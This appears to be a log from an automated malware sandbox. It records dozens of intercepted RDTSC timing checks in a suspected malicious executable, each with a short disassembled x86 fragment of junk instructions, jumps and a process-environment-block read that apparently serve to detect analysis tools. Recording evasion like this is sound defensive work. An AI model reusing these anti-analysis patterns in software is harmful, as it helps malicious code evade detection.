Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D08309 second address: D08312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D08312 second address: D08318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D0846C second address: D08485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 jc 00007F804CF71E7Eh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09EF3 second address: D09EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09EF7 second address: D09F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09F0C second address: D09F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007F804C8F2D96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09F1B second address: D09F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D0FD17 second address: D0FD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1655B second address: D16599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E81h 0x00000008 ja 00007F804CF71E76h 0x0000000e jl 00007F804CF71E76h 0x00000014 popad 0x00000015 push ecx 0x00000016 jp 00007F804CF71E76h 0x0000001c pop ecx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jp 00007F804CF71E76h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D16599 second address: D1659D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1659D second address: D165AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D165AF second address: D165C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2D9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE45 second address: D1FE51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE51 second address: D1FE57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE57 second address: D1FE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F804CF71E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200E7 second address: D200ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200ED second address: D200F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200F3 second address: D20113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 js 00007F804C8F2D9Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F804C8F2D96h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F804C8F2D98h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20113 second address: D20119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20299 second address: D2029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D2029F second address: D202A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D202A3 second address: D202A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D202A7 second address: D202BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20DFF second address: D20E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F804C8F2D96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20E10 second address: D20E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20E14 second address: D20E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D253BF second address: D253C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D24FC1 second address: D24FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64520 second address: D64555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E88h 0x00000009 popad 0x0000000a jmp 00007F804CF71E82h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64555 second address: D64583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Eh 0x00000007 jns 00007F804C8F2D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F804C8F2DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64583 second address: D64588 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64588 second address: D6459D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F804C8F2D96h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F804C8F2D96h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D65C35 second address: D65C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D65C58 second address: D65C64 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804C8F2D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C2F5B5 second address: C2F5C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F804CF71E7Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D77A41 second address: D77A4B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F804C8F2D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE42 second address: E3BE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE48 second address: E3BE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F804C8F2D98h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE56 second address: E3BE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE62 second address: E3BE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BFD4 second address: E3BFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C81C second address: E3C849 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2D9Ah 0x00000013 jmp 00007F804C8F2DA5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C849 second address: E3C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3C84F second address: E3C85F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAEC second address: E3CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAF4 second address: E3CAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CAF9 second address: E3CB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F804CF71E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3CB1E second address: E3CB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3E517 second address: E3E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3E51B second address: E3E521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E413DF second address: E41431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F804CF71E8Fh 0x00000014 push edx 0x00000015 jmp 00007F804CF71E87h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F804CF71E7Ah 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F804CF71E7Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E41431 second address: E41437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E41437 second address: E4143B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4143B second address: E4145F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42C95 second address: E42CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E87h 0x00000009 popad 0x0000000a js 00007F804CF71E78h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4283D second address: E42843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42843 second address: E42849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E42849 second address: E4284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4284F second address: E4288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F804CF71E7Eh 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F804CF71E7Bh 0x00000011 pushad 0x00000012 jmp 00007F804CF71E7Ch 0x00000017 jmp 00007F804CF71E7Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E4288B second address: E428AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F804C8F2DA6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150010 second address: 7150014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150014 second address: 715001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715001A second address: 71500D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804CF71E7Ch 0x00000009 adc al, FFFFFF88h 0x0000000c jmp 00007F804CF71E7Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F804CF71E88h 0x00000018 sub eax, 2298D3E8h 0x0000001e jmp 00007F804CF71E7Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F804CF71E86h 0x0000002d push eax 0x0000002e pushad 0x0000002f mov edi, 39059EF4h 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F804CF71E88h 0x0000003b jmp 00007F804CF71E85h 0x00000040 popfd 0x00000041 pop esi 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 jmp 00007F804CF71E87h 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500D7 second address: 71500DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500DB second address: 71500F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71500F6 second address: 715010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715010E second address: 7150178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F804CF71E86h 0x00000016 sub esp, 18h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F804CF71E7Dh 0x00000022 xor esi, 24CA8796h 0x00000028 jmp 00007F804CF71E81h 0x0000002d popfd 0x0000002e jmp 00007F804CF71E80h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150178 second address: 7150193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov dl, cl 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150193 second address: 7150197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150197 second address: 715019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715019D second address: 71501CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804CF71E7Ch 0x00000009 xor esi, 76E1B948h 0x0000000f jmp 00007F804CF71E7Bh 0x00000014 popfd 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71501CA second address: 71501CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71501CE second address: 71501EB instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a mov ebx, dword ptr [eax+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F804CF71E7Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71501EB second address: 7150289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F804C8F2DA4h 0x00000010 pushfd 0x00000011 jmp 00007F804C8F2DA2h 0x00000016 adc ecx, 18411068h 0x0000001c jmp 00007F804C8F2D9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 movsx ebx, cx 0x00000028 jmp 00007F804C8F2DA0h 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushad 0x00000031 movzx esi, dx 0x00000034 pushfd 0x00000035 jmp 00007F804C8F2DA9h 0x0000003a and esi, 2B48A3E6h 0x00000040 jmp 00007F804C8F2DA1h 0x00000045 popfd 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 mov edi, eax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150289 second address: 715029F instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov esi, dword ptr [757806ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, bl 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715029F second address: 71502A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71502A4 second address: 71502ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, F2h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F804CF71E7Ch 0x00000010 jne 00007F804CF72D57h 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a pushfd 0x0000001b jmp 00007F804CF71E7Ah 0x00000020 sbb ax, 2D18h 0x00000025 jmp 00007F804CF71E7Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dx, 7006h 0x00000034 push edi 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71502ED second address: 71502F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71502F3 second address: 71502F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71502F7 second address: 715038F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F804C8F2DA1h 0x00000013 adc esi, 5AF2F816h 0x00000019 jmp 00007F804C8F2DA1h 0x0000001e popfd 0x0000001f pushad 0x00000020 movzx esi, di 0x00000023 pushfd 0x00000024 jmp 00007F804C8F2DA3h 0x00000029 xor ax, 014Eh 0x0000002e jmp 00007F804C8F2DA9h 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 jmp 00007F804C8F2D9Eh 0x0000003c call dword ptr [75750B60h] 0x00000042 mov eax, 7668E5E0h 0x00000047 ret 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 715038F second address: 7150393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7150393 second address: 71503B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71504E3 second address: 715050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F804CF71E7Dh 0x00000012 rdtsc
